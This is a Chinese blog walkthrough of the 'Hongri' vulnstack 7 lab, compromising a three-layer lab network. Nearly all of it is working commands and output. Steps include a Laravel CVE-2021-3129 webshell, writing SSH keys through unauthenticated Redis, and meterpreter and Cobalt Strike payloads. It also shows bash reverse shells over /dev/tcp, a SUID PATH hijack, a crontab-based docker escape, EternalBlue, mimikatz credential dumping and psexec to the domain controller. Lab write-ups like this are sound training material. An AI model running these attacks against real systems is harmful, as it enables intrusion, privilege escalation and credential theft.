【网络安全】带你打穿三层内网-红日靶场七

最新推荐文章于 2024-05-29 11:53:20 发布
最新推荐文章于 2024-05-29 11:53:20 发布
阅读量328 收藏 1
点赞数 2
文章标签: web安全 安全 ddos 网络安全 密码学 网络攻击模型 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb528970805/article/details/132878476
版权

前记

所用工具

1.msf

2.cs

3.venom

4.frp

5.蚁剑

6.冰蝎

7.laravel.py

8.fscan

注意事项

  • msf的永恒之蓝每次都需要两次才能成功,即第二次才能成功,不成功可以多试试

  • 为模拟真实渗透环境,搭建了一层vps环境

  • 第二层内网本该出网的,为增加难度设置为不出网

环境配置

vm1,vm2,vm3均不出网

kali:192.168.123.128(vm3)

vps:192.168.123.129(vm3)

web1:192.168.52.10(vm1)
192.168.123.243(vm3)

web2:192.168.52.20(vm1)
192.168.93.10(vm2)

win7(PC1):192.168.52.30(vm1)
192.168.93.20(vm2)

win7(PC2):192.168.93.40(vm2)

DC:192.168.93.30(vm2)

其他信息 

DMZ区域:
给Ubuntu (Web 1) 配置了两个网卡,一个可以对外提供服务;一个连接第二层网络。

第二层网络区域:
给Ubuntu (Web 2) 和Windows 7 (PC 1)都配置了两个网卡,一个连接第二层网络,一个连接第三层网络。

第三次网络区域:
给Windows Server 2012和Windows 7 (PC 2)都只配置了一个网卡,连接第三层网络。


Administrator:Whoami2021
bunny:Bunny2021
moretz:Moretz2021
Ubuntu 1:ubuntu:web2021
Ubuntu 2:ubuntu:ubuntu
通达OA账户:admin:admin657260

DMZ Ubuntu 需要启动nginx服务:
sudo redis-server /etc/redis.conf
sudo /usr/sbin/nginx -c /etc/nginx/nginx.conf
sudo iptables -F
第二层网络的 Ubuntu需要启动docker容器:
sudo service docker start
sudo docker start 8e172820ac78
第三层网络的 Windows 7 (PC 1)需要启动通达OA:
C:\MYOA\bin\AutoConfig.exe

web1

信息搜集

sudo nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 512 --host-timeout 30 -T3 -v -oG result.txt --script http-methods --script-args http.useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0"  192.168.123.243  -p 0-65535

22/tcp   open  ssh
80/tcp   open  http
81/tcp   open  hosts2-ns
6379/tcp open  redis

22可以爆破ssh

80无法访问,81是一个Laravel框架

6379可尝试未授权访问、弱口令爆破

./fscan -h 192.168.123.243
[+] Redis:192.168.123.172:6379 unauthorized file:/home/web/dump.rdb
[+] Redis:192.168.123.172:6379 like can write /root/.ssh/
[+] Redis:192.168.123.172:6379 like can write /var/spool/cron/
[*] WebTitle: http://192.168.123.172    code:404 len:548    title:404 Not Found
[*] WebTitle: http://192.168.123.172:81 code:200 len:17474  title:Laravel
[+] InfoScan: http://192.168.123.172:81 [Laravel] 
[+] http://192.168.123.172:81 poc-yaml-laravel-cve-2021-3129

 redis未授权,laravel存在cve

whatweb http://192.168.123.243:81/
发现这里是nginx中间件
http://192.168.123.243:81/ [200 OK] Cookies[XSRF-TOKEN,laravel_session], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], HttpOnly[laravel_session], IP[192.168.123.243], Laravel, PHP[7.4.14], Title[Laravel], X-Powered-By[PHP/7.4.14], nginx[1.14.0]

cve-2021-3129

先从81的Laravel框架漏洞入手

python laravel.py -u http://192.168.123.243:81/
python laravel.py -u http://192.168.123.243:81/ --exp
成功写入webshell, 访问地址 http://192.168.123.243:81/shell.php , 密码 whoami

拿到shell,为www权限

ls -alh /.dockerenv    非docker环境,一般没有这个.dockerenv文件
cat /proc/1/cgroup
cat /proc/self/status | grep CapEff

发现是docker,非特权模式开启的。先放着看看6379端口 

redis未授权|ssh密钥

(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;

(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。

探测漏洞

python2 redis.py 192.168.123.243 6379
探测确实存在漏洞

利用漏洞

sudo su root
ssh-keygen -t rsa  #生成公钥
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 1.txt
cat 1.txt | redis-cli -h 192.168.123.243 -p 6379 -x set hello
redis-cli -h 192.168.123.243
config set dir /root/.ssh
config set dbfilename authorized_keys
save
cd /root/.ssh/
ssh -i id_rsa root@192.168.123.243

 后渗透

目标机器为linux,我们通过frp反向代理到vps,上线msf

frp配置

[common]
server_addr = 192.168.123.129
server_port = 9876
tls_enable = true
token = coleak
 
[CS_Server_6666]
type = tcp
local_ip = 127.0.0.1
local_port = 6666
remote_port = 6666
 
[Beacon]
type = tcp
local_ip = 127.0.0.1
local_port = 6667
remote_port = 6667

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 7777
remote_port = 7777

[cs->msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4566
remote_port = 4566

[server]
type = tcp
local_ip = 127.0.0.1
local_port = 80
remote_port = 8888

上线msf 

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.123.129 LPORT=7777 -f elf > shell.elf


use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 7777
show options
set AutoRunScript migrate -f
set PrependMigrate true
exploit


python -m http.server 80
wget http://192.168.123.129:8888/shell.elf
chmod +x shell.elf
./shell.elf

上线cs

监听https端口,6667
./genCrossC2.Linux 192.168.123.129 6667 .cobaltstrike.beacon_keys null Linux x64 /home/coleak/桌面/CrossC2-test
python -m http.server 80
wget http://192.168.123.129:8888/CrossC2-test
chmod +x CrossC2-test

Venom

agent监听端口,admin发起连接
wget http://192.168.123.129:8888/agent_linux_x64
./agent_linux_x64 -lport 8888
./admin_linux_x64 -rhost 192.168.123.243 -rport 8888

这里我们先把fscan上传到目标机器,对内网进行扫描

wget http://192.168.123.129:8888/fscan_amd64
chmod +x fscan_amd64
./fscan_amd64 -h 192.168.52.0/24
(icmp) Target 192.168.52.10   is alive
(icmp) Target 192.168.52.20   is alive
(icmp) Target 192.168.52.30   is alive
[*] Icmp alive hosts len is: 3
192.168.52.10:8888 open
192.168.52.20:8000 open
192.168.52.30:8080 open
192.168.52.30:445 open
192.168.52.30:139 open
192.168.52.30:135 open
192.168.52.20:22 open
192.168.52.10:22 open
192.168.52.10:81 open
192.168.52.10:80 open
[*] alive ports len is: 10
start vulscan
[+] 192.168.52.30       MS17-010        (Windows 7 Professional 7601 Service Pack 1)
[*] NetBios: 192.168.52.30   PC1.whoamianony.org                 Windows 7 Professional 7601 Service Pack 1 
[*] WebTitle: http://192.168.52.30:8080 code:200 len:10065  title:通达OA网络智能办公系统
[+] InfoScan:http://192.168.52.30:8080 [通达OA] 
[+] http://192.168.52.30:8080 tongda-user-session-disclosure 
[*] WebTitle: http://192.168.52.10      code:404 len:548    title:404 Not Found
[*] WebTitle: http://192.168.52.20:8000 code:200 len:17474  title:Laravel
[+] InfoScan:http://192.168.52.20:8000 [Laravel]

尝试MS17-010永恒之蓝进入win7

至于52.20这台机器从8000和22端口入手

这里查看nginx配置文件

nginx -t
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
cd /etc/nginx/conf.d/
cat 80
server {
    listen 80;
    server_name www.whopen.com;

    location / {
       proxy_pass https://whoamianony.top/;
    }
}

cat 81
server {
    listen 81;
    server_name localhost;

    location / {
       proxy_pass http://192.168.52.20:8000;
    }
}

外网81服务是内网8000进行Nginx反向代理出来的

Win7(PC1)

永恒之蓝

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.52.30
set RPORT 445
set lport 8526
setg Proxies socks5:127.0.0.1:9999
setg ReverseAllowProxy true
run

拿到web2的system权限,由于是windows,,所以上线cs操作

通过frp上线pc1到cs

在web1上开启s端

[common]
bind_port = 6789

 在vps开启c端

[common]
server_addr = 192.168.123.243
server_port = 6789

[Beacon]
type = tcp
local_ip = 127.0.0.1
local_port = 6667
remote_port = 6667

注意我们已经将kali的6667和vps的6667关联,所以其实web1的6667最终流量会到达kali,注意监听器需要设置为web1的内网ip,通过http连接

upload beacon1.exe c://Python27
shell
chcp 65001
beacon1.exe

web2

根据之前对nginx配置分析得知

http://192.168.123.243:81/shell.php , 密码 whoami
直接访问http://192.168.52.20:8000/shell.php

上线为www权限,还在docker中,考虑提权再逃逸

find / -perm -u=s -type f 2>/dev/null

/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/home/jobs/shell
/bin/mount
/bin/su
/bin/umount

反弹shell,这里需要将kali的监听端口转发到web1上,然后让web2来连接web1

nc -lvp 3443
lforward 127.0.0.1 3443 3443
bash -c "bash -i >& /dev/tcp/192.168.52.10/3443 0>&1"

依次查找相关信息,发现shell可能存在漏洞,执行了ps命令

PID TTY          TIME CMD 1 ?        00:00:00 apache2 119 ?        00:00:00 shell 120 ?        00:00:00 sh 121 ?        00:00:00 ps
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH 
export PATH=/tmp:$PATH
cd /home/jobs
./shell

通过suid提权成功拿到root权限

docker逃逸

检测是否为特权模式开启

cat /proc/self/status | grep CapEff
以特权模式启动的话,CapEff 对应的掩码值应该为0000003fffffffff 或者是 0000001fffffffff

监听3445端口,并端口转发到web1

nc -lvp 3445
lforward 127.0.0.1 3445 3445

设置定时任务将宿主机反弹shell到web1,再到kali 

fdisk -l
mkdir /hacker
mount /dev/sda1 /hacker
touch /hacker/hacker.sh
echo "bash -i >& /dev/tcp/192.168.52.10/3445 0>&1" >/hacker/hacker.sh
echo "* * * * * root bash /hacker.sh" >> /hacker/etc/crontab

成功拿下web2的root权限

win7(PC2)|DC

通过win7(pc1)横向渗透,抓取hash和明文可以抓取到域内用户bunny的密码值,上传fscan对93c段进行扫描

shell C:\Python27\fscan64.exe -h 192.168.93.0/24 > 11.txt
download C:\Python27\11.txt

下载后放在目录/home/coleak/桌面/cs4.7by_mht_vip/downloads/中

start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.93.20   is alive
(icmp) Target 192.168.93.30   is alive
(icmp) Target 192.168.93.40   is alive
[*] Icmp alive hosts len is: 3
192.168.93.20:445 open
192.168.93.40:139 open
192.168.93.30:88 open
192.168.93.20:8080 open
192.168.93.40:445 open
192.168.93.30:445 open
192.168.93.30:139 open
192.168.93.40:135 open
192.168.93.30:135 open
192.168.93.20:139 open
192.168.93.20:135 open
[*] alive ports len is: 11
start vulscan
[+] 192.168.93.20	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[*] NetInfo:
[*]192.168.93.30
   [->]DC
   [->]192.168.93.30
[+] 192.168.93.40	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[+] 192.168.93.30	MS17-010	(Windows Server 2012 R2 Datacenter 9600)
[*] NetBios: 192.168.93.40   PC2.whoamianony.org                 Windows 7 Professional 7601 Service Pack 1 
[*] NetBios: 192.168.93.30   [+]DC DC.whoamianony.org            Windows Server 2012 R2 Datacenter 9600 
[*] WebTitle: http://192.168.93.20:8080 code:200 len:10065  title:通达OA网络智能办公系统
[+] InfoScan:http://192.168.93.20:8080 [通达OA] 
[+] http://192.168.93.20:8080 tongda-user-session-disclosure 
已完成 11/11
[*] 扫描结束,耗时: 15.9012269s

发现DC和win7-2均存在MS17-010永恒之蓝,上线venom

goto 1
listen 8081
shell C:\Python27\agent.exe -rhost 192.168.52.10 -rport 8081
goto 2
socks 19999

通过msf上线

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.93.30
set RPORT 445
set lport 8527
setg Proxies socks5:127.0.0.1:19999
setg ReverseAllowProxy true
run

这里域控上线失败了,但是win7-2成功!

migrate 1316
load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords

成功抓到域用户和域管理员的密码

bunny:Bunny2021
administrator:Whoami2021

通过转发上线设置一个pc1的中转监听器,生成exe,上线cs

upload beacon2.exe c://MYOA

在win7上关闭dc的防火墙

net use \192.168.93.30\ipc$ "Whoami2021" /user:”Administrator”
sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall

psexec到dc

use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
set smbuser administrator
set smbpass Whoami2021
setg Proxies socks5:127.0.0.1:19999
setg ReverseAllowProxy true
run

网络安全玛卡巴卡
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[安全]Web安全Day7 - 越权/非授权访问实战攻防
hongrisec的博客
03-02 1496
本文由安全成员: misakikata 编写,如有不当,还望斧正。 大家好,我们是安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、P...
国光的手把手你用 SSRF 打穿靶场源码.zip
01-16
在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场为安全从业者提供了一个模拟真实络环境的平台。通过构建类似实际络的拓扑结构、部署...
靶场(七)vulnstack7
qq_63451318的博客
04-07 1685
自学网络安全,学习靶场渗透
安全att&ck靶场7 内靶场 WP
trytowritecode的博客
04-11 6993
记一次中型靶场getshell全过程,难度适中,很有意思 这里用kali来模拟外攻击机,其实用自己服务器也完全ok 个人认为,此方法比官方wp要好懂一些 首先是靶场地址 靶场 先看拓扑图因为环境要提前配置,这里的192.168.1.0/24的这个段根据自己的虚拟机环境来改不一定说一定要和官方拓扑一模一样,就像我自己就是192.168.16.0/24 看下图 然后开始配置环境,卡这里官方已经处理的差不多了,大概是能测试ping通就行 然后启动服务这里全按官方说明来配置 这里注意了很重要不然你后面打靶
靶机vulnstack07【半总结】
qq_45300786的博客
10-12 510
web1是nginx代理服务器,真正的服务器是web2 web1监听本地81端口,然后转发到web2的8000端口。(要不是靶场,还真不清楚咋回事) 参考: 安全ATT&CK靶机实战系列之vulnstack7 自主搭建的三层络域渗透靶场打靶记录 内攻防-靶机7 ...
靶场七教程,不看后悔!
weixin_45885440的博客
10-11 1284
主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内渗透以及域渗透等相关内容学习
ATT&CK实战:靶场
学生
06-19 614
*] WebTitle: http://192.168.52.30:8080 code:200 len:10065 title:通达OA络智能办公系统。[*] WebTitle: http://192.168.93.20:8080 code:200 len:10065 title:通达OA络智能办公系统。[+] InfoScan:http://192.168.52.30:8080 [通达OA][+] InfoScan:http://192.168.93.20:8080 [通达OA]
你打穿三层内-靶场
记录学习,一起进步
09-13 337
你打穿三层内-靶场
渗透—靶场
一个普普通通的博客
04-23 5255
靶场三—队实战,内渗透
网络安全技术- NAT-03 NAT隐藏内.mp3
07-04
网络安全技术- NAT-03 NAT隐藏内.mp3
第71天:内安全-域横向络&传输&应用层隧道技术1
08-03
1.代理和隧道技术区别 2.隧道技术为了解决什么 3.隧道技术前期的必备条件 1.双向连接反弹 shell 2.多向连接反弹 shell-配合转发 3.相关 n
SCZF-ZD-004 内络及用户管理制度.pdf
04-11
SCZF-ZD-004 内络及用户管理制度.pdfSCZF-ZD-004 内络及用户管理制度.pdfSCZF-ZD-004 内络及用户管理制度.pdfSCZF-ZD-004 内络及用户管理制度.pdfSCZF-ZD-004 内络及用户管理制度.pdfSCZF-ZD-...
构建坚不可摧的Web安全防线:深入剖析二阶注入与全面防御策略
weixin_43822401的博客
05-27 885
SQL注入攻击通过在用户输入中嵌入恶意SQL代码,企图让数据库执行这些非法命令,从而达到窃取、破坏或篡改数据的目的。
如何处理安发出的网络安全监督检查限期整改通知
联蔚盘云的博客
05-27 414
近期,很多客户都收到了安发出的限期整改通知。大家都比较关心的问题是,如何应对处理这些限期整改通知。后续是否有其他的影响,需要如何做进一步的优化整改和调整。今天就这些问题给大家做一些分享。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 1090
防火墙是一种网络安全设备,用于监视和控制络数据流量。其主要功能是在不同络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制络流量的通过与阻止,这些规则可以根据络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
网络安全中攻击溯源方法
最新发布
2301_76786857的博客
05-29 885
攻击溯源可以帮助用户对攻击放进行锁定放入数据库,可以帮助其他用户进行态势感知,同时可以协调相关组织打击违法犯罪行为,避免下一次的攻击。2、分析攻击特征:通过分析攻击事件的特征,如攻击方式、攻击时间、攻击目标等,来确定攻击类型和攻击者的特点。4、分析攻击工具:通过分析攻击者使用的工具、恶意代码等,确定攻击者的攻击技术和水平,进而锁定攻击者身份。5、建立攻击链路:通过对攻击事件的各个环节进行分析,建立攻击链路,找到攻击者入侵的路径和方法。1、收集证据:收集攻击事件的各种证据,包括志、络数据包、磁盘镜像等。
黑龙江等保测评:强化网络安全的北方防线
2301_79527080的博客
05-28 426
二、黑龙江等保测评的实践探索1. 法规政策引领:黑龙江省积极响应国家网络安全法律法规要求,出台了一系列地方性政策文件,明确了等保测评的实施标准和要求,为全省范围内的等保工作提供了法律依据和指导。2. 强化合规意识:等保测评的实施增强了组织和个人的网络安全合规意识,推动了网络安全法律法规的落实,形成了良好的网络安全文化氛围。3. 促进产业发展:等保测评需求动了网络安全服务市场的繁荣,促进了本土网络安全企业的成长,同时也吸引了国内外先进技术和服务的引进,为黑龙江乃至东北地区的数字经济转型提供了安全保障。
新钛云服助力上海市某国有企业集团实现网络安全和运维优化
NewTyun的博客
05-29 718
新钛云服已累计为您分享796篇技术干货01概 述项目背景该企业集团是上海市某区国有资产监督管理委员会直属管理的大型企业集团,主要承担该区政府赋予的重点工程和重大项目投融资和资产经营管理两大任务。随着业务和技术不断发展,新的络和安全威胁不断涌现。该企业集团需要不断升级和调整其络和安全架构以适应新的技术趋势和安全挑战。另一方面,经过前期梳理,已发现该企业集团的部分设备存在老化、过保的情况。为了更好...
靶场ping不通内
08-17
您好!关于靶场无法ping通内的问题,我需要更多的详细信息才能给出准确的解答。以下是一些可能的原因和解决方法: 1. 防火墙设置:确保您的内防火墙未阻止来自靶场IP的ping请求。请检查防火墙规则并确保允许ping请求通过。 2. 内路由设置:检查您的内路由设置,确保正确配置了与靶场之间的路由。如果路由不正确,可能会导致ping不通。 3. IP地址冲突:检查内中是否存在与靶场IP地址冲突的情况。如果有IP地址冲突,可能会导致通信问题。 4. 络连接问题:检查您的络连接是否正常。尝试使用其他设备或络连接进行测试,以确定问题是否出现在您的设备上。 请提供更多关于您的络设置和具体步骤的信息,以便我可以为您提供更准确的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值